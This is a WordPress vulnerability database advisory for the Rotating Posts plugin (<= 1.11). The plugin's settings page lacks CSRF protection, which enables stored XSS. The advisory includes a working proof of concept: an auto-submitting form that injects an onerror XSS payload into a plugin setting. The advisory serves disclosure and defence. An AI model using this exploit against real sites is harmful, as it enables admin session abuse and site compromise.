WordPress Plugin Vulnerabilities
Rotating Posts <= 1.11 - Arbitrary Settings Update to Stored XSS via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=rp-admin.php" method="POST"> <input type="text" name="rp_submit_hidden" value="submit"> <input type="text" name="rp_number_posts" value="5"> <input type="text" name="rp_timer_sec" value="5"> <input type="text" name="rp_read_more" value='"><img src=x onerror=alert(/XSS/)>'> <input type="text" name="rp_title" value="true"> <input type="text" name="rp_date_time" value="true"> <input type="text" name="rp_date_time_str" value="F jS, Y"> <input type="text" name="rp_author" value="true"> <input type="text" name="rp_author_prefix" value="by"> <input type="text" name="rp_categories" value="true"> <input type="text" name="rp_comments" value="true"> <input type="text" name="rp_use_this_category" value="0"> <input type="text" name="rp_left" value="https://example.com/wp-content/plugins/rotating-posts/images/left.jpg"> <input type="text" name="rp_right" value="https://example.com/wp-content/plugins/rotating-posts/images/right.jpg"> <input type="text" name="rp_pause_normal" value="https://example.com/wp-content/plugins/rotating-posts/images/pause.jpg"> <input type="text" name="rp_pause_pressed" value="https://example.com/wp-content/plugins/rotating-posts/images/pause_on.jpg"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-31 (about 1 years ago)
Added
2022-05-31 (about 1 years ago)
Last Updated
2023-03-01 (about 1 years ago)